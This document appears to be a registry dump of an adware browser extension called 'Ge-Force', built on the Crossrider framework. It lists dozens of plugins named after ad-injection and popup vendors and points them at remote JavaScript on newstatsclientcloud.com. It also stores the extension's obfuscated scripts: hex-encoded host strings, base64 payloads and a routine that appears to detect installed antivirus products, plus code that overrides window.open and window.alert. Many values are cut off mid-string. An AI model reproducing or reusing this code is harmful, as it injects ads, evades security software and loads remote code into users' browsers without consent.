"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Ge-Force\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\Ge-Force\Plugins\337]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:TEN}))();};"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Ge-Force\Plugins\288]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/288.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Ge-Force\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Ge-Force\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"
[HKCU\Software\Ge-Force\Plugins\14]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/14.js"
[HKCU\Software\Ge-Force\Manifest]
"UninstallerOfferUrl" = "NA"
"DisableIe" = "true"
[HKCU\Software\Ge-Force\Plugins\246]
"JavaScript" = "var _0x6ef5=["\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72"
[HKCU\Software\Ge-Force\Installer]
"DefaultBrowser" = "ie"
[HKCU\Software\Ge-Force\Plugins\337]
"Name" = "icm_ten_m"
[HKCU\Software\Ge-Force\Plugins\39]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/39.js"
[HKCU\Software\Ge-Force\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"
[HKCU\Software\Ge-Force\Plugins\301]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('…"
[HKLM\SOFTWARE\Ge-Force\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Ge-Force\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\Ge-Force\Plugins\246]
"Name" = "setup"
[HKCU\Software\Ge-Force\Installer]
"Time" = "1421039403"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\184]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/184.js"
[HKCU\Software\Ge-Force\Plugins\40]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/40.js"
[HKCU\Software\Ge-Force\Installer]
"AdditionalInfo" = "{"asw":[0, 1073750528, -2147483648, 0],"browser_name":"ie"
"StatsDomain" = "http://stats.newstatsclientcloud.com"
[HKCU\Software\Ge-Force\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\Ge-Force\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveI"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"
[HKCU\Software\Ge-Force\Plugins\350]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/350.js"
[HKCU\Software\Ge-Force\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\Ge-Force\Plugins\21]
"Name" = "debug"
[HKCU\Software\Ge-Force\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Ge-Force\Plugins\45]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/45.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\38]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\356]
"Name" = "icm_man_m"
[HKCU\Software\Ge-Force\Manifest]
"EnableSearchIE" = "false"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Ge-Force\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Ge-Force\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\InstalledBrowserExtensions\iWebar]
"69129" = "Ge-Force"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Ge-Force\Plugins\286]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Ge-Force\Plugins\28]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/28.js"
[HKCU\Software\Ge-Force\Plugins\354]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/354.js"
[HKCU\Software\Ge-Force\Plugins\104]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/104.js"
[HKCU\Software\Ge-Force\Plugins\192]
"Version" = "10"
[HKCU\Software\Ge-Force\Plugins\91]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/91.js"
[HKCU\Software\Ge-Force\Plugins\345]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/345.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Ge-Force\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"
[HKCU\Software\Ge-Force\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seɾ"
[HKCU\Software\Ge-Force\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\Ge-Force\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Ge-Force\Plugins\273]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/273.js"
[HKCU\Software\Ge-Force\Plugins\22]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,@"
[HKCU\Software\Ge-Force\Plugins\281]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\200]
"Name" = "foxydeal_m"
[HKCU\Software\Ge-Force\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358],intext:[103,117,123,142,259,263,342,359,360],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351]};"
[HKCU\Software\Ge-Force\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/HOST = http://wt.iwebar.com;TOOLBAR_URL = HOST '/js/toolbar.js';AFFILIATE_ID = 'NONE';appAPI.ready(function($) { /* if (appAPI.db.get('user_id') === null) { if (appAPI.db.get('installation') === null){ appAPI.db.set('installation', new Date().getTime()); return; } else { if ((new Date().getTime() - appAPI.db.get('installation')) Extension [version: appAPI.appInfo.version ] loading...); // Set the affiliate ID //appAPI.db.set('affiliate_id', AFFILIATE_ID); // Include the Base64 library appAPI."
[HKCU\Software\Ge-Force\Manifest]
"RunInFrame" = "false"
[HKCU\Software\Ge-Force\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\Ge-Force\Plugins\123]
"Version" = "12"
[HKCU\Software\Ge-Force\Plugins\192]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('…', 'jlxnmxfiyl'); }"
[HKCU\Software\Ge-Force\Manifest]
"BgVersion" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppName" = "Ge-Force-bg.exe"
[HKCU\Software\Ge-Force\Plugins\46]
"Version" = "5"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppName" = "Ge-Force-codedownloader.exe"
[HKCU\Software\Ge-Force]
"ActiveAppId" = "69129"
[HKCU\Software\Ge-Force\Plugins\183]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/183.js"
[HKCU\Software\Crossrider]
"Verifier" = "7d6635bb3acc762051a59407230a02ec"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "69129"
"DisplayVersion" = "1.35.12.18"
[HKCU\Software\Ge-Force\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,91"
[HKCU\Software\Ge-Force\Plugins\72]
"Name" = "appApiValidation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\Ge-Force\Plugins\207]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/207.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Ge-Force\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.e"
[HKCU\Software\Ge-Force\Plugins\350]
"Name" = "nguava_m"
[HKCU\Software\Ge-Force\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars)"
[HKCU\Software\Ge-Force\Debug]
"IsDebuggingPlugins" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\288]
"Name" = "firstoffer_pricecomp_m"
[HKCU\Software\Ge-Force\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var y={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"
[HKCU\Software\Ge-Force\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKCU\Software\Ge-Force\Plugins\35]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/35.js"
[HKCU\Software\Ge-Force\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKCU\Software\Ge-Force\Plugins\40]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\Ge-Force\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Ge-Force\Plugins\21]
"Version" = "5"
[HKLM\SOFTWARE\Ge-Force\Installer]
"BundledIe" = "1"
[HKCU\Software\Ge-Force\Plugins\354]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\193]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/193.js"
[HKCU\Software\Ge-Force\Plugins\42]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/42.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Ge-Force\Plugins\39]
"JavaScript" = "if(typeof appAPI==="undefined"){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g="%@%ZZCR__AJAXZZ$C@R#";function e(o,q,l,p){if(typeof(o)!=="string"){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m=="InstallerParams"&&n=="Local"){return appAPI.JSON.parse(appAPI.internal.prefs.getChar("Params"
[HKCU\Software\Ge-Force\Plugins\193]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"
[HKCU\Software\Ge-Force\Plugins\1]
"JavaScript" = "var __a0__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63\x64\x6e\x2e\x6e\x65\x74'].join('')var __a1__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69\x6e\x67\x2d\x61\x70','\x70\x2e\x63\x72\x6f\x73\x73\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a2__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f','\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63','\x64\x6e\x2e\x6e\x65\x74'].join('')var __a3__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69','\x6e\x67\x2d\x61\x70\x70\x2e\x63\x72\x6f\x73\x73','\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a4__ = ['\x68\x74\x74\x70\x3a\x2f','\x2f\x6e\x73\x74\x61\x74','\x73\x2e\x63\x72\x6f\x73','\x73\x72\x69\x64\x65\x72','\x2e\x63\x6f\x6d'].join('')var __a5__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74','\x61\x67\x69\x6e\x67\x2d\x61\x70\x70','\x2e\x63\x72\x6f\x73\x73\x72\x69\x64','\x65\x72\x2e\x63\x6f\x6d'].join('')var __a6__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f','\x75\x72\"
[HKCU\Software\Ge-Force\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\Ge-Force\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""
[HKCU\Software\Ge-Force\Plugins\44]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/44.js"
[HKCU\Software\Ge-Force\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\Ge-Force\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]"
[HKCU\Software\Ge-Force\Installer]
"zdata" = "0"
[HKCU\Software\Ge-Force\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Ge-Force\Installer]
"Params" = "{ source_id : 001729, sub_id : 0, uzid : 0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Ge-Force\Manifest]
"Version" = "9"
[HKCU\Software\Ge-Force\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Ge-Force\Plugins\286]
"Name" = "sp_j_m"
[HKCU\Software\Ge-Force\Plugins\36]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/36.js"
[HKCU\Software\Ge-Force\Plugins\246]
"Version" = "15"
[HKCU\Software\Ge-Force\Plugins\3]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/3.js"
[HKCU\Software\Ge-Force\Plugins\345]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\91]
"Version" = "111"
[HKCU\Software\Ge-Force\Plugins\47]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/47.js"
[HKCU\Software\Ge-Force\Plugins\301]
"Name" = "guava_m"
[HKCU\Software\Ge-Force\Plugins\45]
